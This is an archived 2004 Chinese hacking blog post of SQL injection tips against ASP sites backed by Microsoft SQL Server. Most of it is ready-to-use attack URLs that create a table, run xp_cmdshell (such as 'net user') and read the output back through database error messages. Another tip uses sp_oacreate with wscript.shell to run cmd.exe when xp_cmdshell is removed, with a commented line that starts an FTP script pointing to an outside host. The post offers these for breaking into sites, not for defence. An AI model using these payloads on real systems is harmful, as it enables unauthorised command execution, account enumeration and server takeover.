注入技巧手记 :: 『孤光剑隐』

来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=529104 存档链接: https://web.archive.org/web/20041224124108id_/http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=529104


本站公告 BLOG停止更新 常见IP碎片攻击详解 从上传webshell到突破TCP-IP筛选到3389终端登陆 子网掩码及其应用 Windows命令行技巧 用PERL打造自己的缓冲区漏洞利用程序 Linux安全综述 DISCUZ2上传漏洞分析 上传漏洞变换利用 如何使tcp包和udp包穿透防火墙 TC函数命令详细表 dreamtheater Angel showlife tx7do jpxiong chensun netsky KKQQ Ziqi spy8888 Luzhu eVan SUNU Taynni wuhui CAT Neeao KusTa Hoky eviloctal lam Iceberg Jace Hardy Gusu・Lanye swap lilo xiaolu knIfe kaka Lo7e4L Super・Hei lichdr lamp FlyWeb evilhsu hackfree powers Sunlion EvilPhive xeric icyfoxlovelace GuoMing swords an85 ring zwx steve S4Ld0ne solaris myzky xpfox liso sevenline Golden・Section phoenix xrens BlackFox tuz hardy29a victorwoo xueyu・xiongying Blackfish skyshui zhouzhen cnbird <<<PHP生成静态页面详解 | 首页 | 子网掩码及其应用>>> 注入技巧手记 时间: 2004-12-06 1.显示cmd执行的回显. 在注入是sa权限时,看不到命令的回显时件很痛苦的事情,在小竹兄的nbsi里也有一个尝试回显,可为什么要尝试了?呵呵 下面我说一种方法,绝对对可看到回显,不知道小竹兄用的是什么方法哦 建立表 语句: http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000));-- 返回:正常的信息!说明建表成功!继续! 语句: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'net user' ;-- 返回:正常信息。应该写入dirs数据正常 语句: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs);-- 返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07 将 varchar 值 '***'转换为数据类型为 int 的列时发生语法错误。 ^_^,这样我们就看到回显的结果了,当然,直接用nbsi暴表里的内容将更快速. 同理 ,其它的扩展也可以用这种方法得到内容哦,比如regread,(没有测试) 2. xp_dirtree写路径的问题 nbsi的目录列表工具不是很好用,有时候显示列不出来,实际上是出来了的哦,你直接暴表的数据(默认是NB_TreeList_Tmp)就看到内容了. 3.检测漏洞存在 nbsi的漏洞检测功能实在不敢恭维,对于写的像数字型的字符他都拒绝检测,就更不用说过滤了引号的类型了,所以还是建议手工检测,这样保证万无一失(:P) 4.删除xpsql70.dll和xp_cmdshell,and无法上传的问题解决 实际上很早以前czy大哥已经说过了,记得lzy好像也说过一个,不过和这个好像不一样 declare @s int exec sp_oacreate "wscript.shell",@s out --exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:\a.txt" 这个是在查询分析器里执行的,直接在地址栏里应该也是可以执行的,像这样 declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo aaa >c:\a.txt" 具体的没有在注入点测试 孤光剑隐 发表于 2004-12-06 10:37 引用Trackback(0) | 编辑 评论 发表评论